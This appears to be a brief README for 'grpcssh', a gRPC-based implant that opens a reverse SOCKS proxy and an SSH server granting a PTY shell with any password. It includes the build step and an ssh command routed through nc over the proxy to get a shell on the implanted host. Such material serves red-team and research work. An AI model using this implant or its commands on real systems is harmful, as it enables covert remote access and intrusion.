better explained over at https://tishina.in/ops/grpcssh
an extension over grpc-ssh-socks. this can be considered a simple reverse shell. on connect,
a socks proxy is opened by the server. connecting over ssh to a hardcoded ip address with
an arbitrary password grants a full pty shell.
DNS resolution is very simple and done via an SSH "session" channel in the form of Write(addr), Read(ip)
this is a reference implementation for a reverse socks proxy in a gRPC-based implant. The SSH server is added mostly for fun.
for the pty shell, full credit goes to https://gist.github.com/jpillora/
here it is, kind of working:
~/grpcssh$ make
to build this even more abominable thing.
~/grpcssh$ ssh -o ProxyCommand="nc -x localhost:1080 %h %p" -o "UserKnownHostsFile=/dev/null" [email protected]
to get a shell.